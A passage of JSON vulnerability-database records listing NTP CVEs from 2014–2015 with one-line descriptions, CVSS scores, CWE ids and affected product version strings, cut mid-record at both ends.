"bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7850"], "modified": "2020-06-18T15:10:00", "cpe": ["cpe:/o:netapp:data_ontap:-", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:oncommand_balance:-", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:netapp:oncommand_performance_manager:-", "cpe:/a:netapp:oncommand_unified_manager:-", "cpe:/o:netapp:clustered_data_ontap:-", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2015-7850", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7850", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:08", "description": "The datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-08-07T20:29:00", "title": "CVE-2015-7853", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7853"], "modified": "2020-06-18T15:44:00", "cpe": ["cpe:/o:netapp:data_ontap:-", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:oncommand_balance:-", "cpe:/a:netapp:oncommand_performance_manager:-", "cpe:/a:netapp:oncommand_unified_manager:-", "cpe:/o:netapp:clustered_data_ontap:-"], "id": "CVE-2015-7853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7853", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:07", "description": "The rate limiting feature in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to have unspecified impact via a large number of crafted requests.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-08-07T20:29:00", "title": "CVE-2015-7705", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7705"], "modified": "2020-06-18T17:15:00", "cpe": ["cpe:/o:netapp:data_ontap:-", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:citrix:xenserver:7.0", "cpe:/a:citrix:xenserver:6.5", "cpe:/a:netapp:oncommand_performance_manager:-", "cpe:/a:citrix:xenserver:6.2.0", "cpe:/a:netapp:oncommand_unified_manager:-", "cpe:/o:netapp:clustered_data_ontap:-"], "id": "CVE-2015-7705", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7705", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.5:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.2.0:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:58:29", "description": "The receive function in ntp_proto.c in ntpd in NTP before 4.2.8 continues to execute after detecting a certain authentication error, which might allow remote attackers to trigger an unintended association change via crafted packets.", "edition": 5, "cvss3": {}, "published": "2014-12-20T02:59:00", "title": "CVE-2014-9296", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9296"], "modified": "2017-11-10T02:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.7"], "id": "CVE-2014-9296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9296", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:08", "description": "Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to bypass authentication.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-08-07T20:29:00", "title": "CVE-2015-7871", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7871"], "modified": "2020-06-18T17:16:00", "cpe": ["cpe:/o:netapp:data_ontap:-", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:oncommand_balance:-", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:netapp:oncommand_performance_manager:-", "cpe:/a:ntp:ntp:4.2.5", "cpe:/a:netapp:oncommand_unified_manager:-", "cpe:/o:netapp:clustered_data_ontap:-", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2015-7871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.5:p238_rc1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p242_rc1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p228:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p243_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p210:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p211:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p223:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p220:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p241_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p208:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p234_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p245_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p190:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p250_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p194:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p216:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p246_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p203:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p191:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p195:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p199:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p226:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p186:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p247_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p221:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p201:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p219:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p244_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p230:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p214:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p224:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p192:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p249_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p227:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p204:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p202:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p222:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p239_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p188:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p212:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p218:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p209:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p215:*:*:*:*:*:*", "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p232_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p206:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p236_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p237_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p213:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p187:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p198:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p233_rc1:*:*:*:*:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p196:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p197:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p193:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p240_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p189:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p229:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p217:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p225:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p200:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p207:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p235_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p248_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p231_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p205:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:08", "description": "The decodenetnum function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (assertion failure) via a 6 or mode 7 packet containing a long data value.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-08-07T20:29:00", "title": "CVE-2015-7855", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7855"], "modified": "2020-06-18T15:45:00", "cpe": ["cpe:/o:netapp:data_ontap:-", "cpe:/o:debian:debian_linux:8.0", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:oncommand_balance:-", "cpe:/o:debian:debian_linux:7.0", "cpe:/a:netapp:oncommand_performance_manager:-", "cpe:/a:netapp:oncommand_unified_manager:-", "cpe:/o:netapp:clustered_data_ontap:-", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2015-7855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7855", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*", "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_balance:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:08", "description": "The ntpq saveconfig command in NTP 4.1.2, 4.2.x before 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not properly filter special characters, which allows attackers to cause unspecified impact via a crafted filename.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-30T21:59:00", "title": "CVE-2015-7976", "type": "cve", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7976"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:ntp:ntp:4.3.18", "cpe:/a:ntp:ntp:4.3.45", "cpe:/a:ntp:ntp:4.3.72", "cpe:/a:ntp:ntp:4.3.0", "cpe:/a:ntp:ntp:4.3.25", "cpe:/a:ntp:ntp:4.3.74", "cpe:/a:ntp:ntp:4.3.28", "cpe:/a:ntp:ntp:4.3.61", "cpe:/a:ntp:ntp:4.3.22", "cpe:/a:ntp:ntp:4.3.51", "cpe:/a:ntp:ntp:4.3.54", "cpe:/a:ntp:ntp:4.3.3", "cpe:/a:ntp:ntp:4.3.81", "cpe:/o:suse:linux_enterprise_desktop:12", "cpe:/a:suse:manager_proxy:2.1", "cpe:/a:ntp:ntp:4.3.67", "cpe:/a:ntp:ntp:4.3.79", "cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/a:ntp:ntp:4.3.76", "cpe:/a:ntp:ntp:4.3.29", "cpe:/a:ntp:ntp:4.3.33", "cpe:/a:ntp:ntp:4.3.20", "cpe:/a:ntp:ntp:4.3.37", "cpe:/a:ntp:ntp:4.3.24", "cpe:/a:ntp:ntp:4.3.49", "cpe:/a:ntp:ntp:4.3.11", "cpe:/a:ntp:ntp:4.3.17", "cpe:/a:ntp:ntp:4.3.19", "cpe:/a:ntp:ntp:4.3.4", "cpe:/a:ntp:ntp:4.3.13", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/a:ntp:ntp:4.3.78", "cpe:/a:ntp:ntp:4.3.31", "cpe:/a:ntp:ntp:4.3.44", "cpe:/a:ntp:ntp:4.3.69", "cpe:/a:ntp:ntp:4.3.1", "cpe:/a:ntp:ntp:4.3.55", "cpe:/a:ntp:ntp:4.3.34", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:ntp:ntp:4.3.23", "cpe:/a:ntp:ntp:4.3.41", "cpe:/a:ntp:ntp:4.3.84", "cpe:/a:ntp:ntp:4.3.75", "cpe:/a:ntp:ntp:4.3.52", "cpe:/a:ntp:ntp:4.3.40", "cpe:/a:suse:linux_enterprise_debuginfo:11", "cpe:/a:ntp:ntp:4.3.10", "cpe:/a:ntp:ntp:4.3.36", "cpe:/a:ntp:ntp:4.3.83", 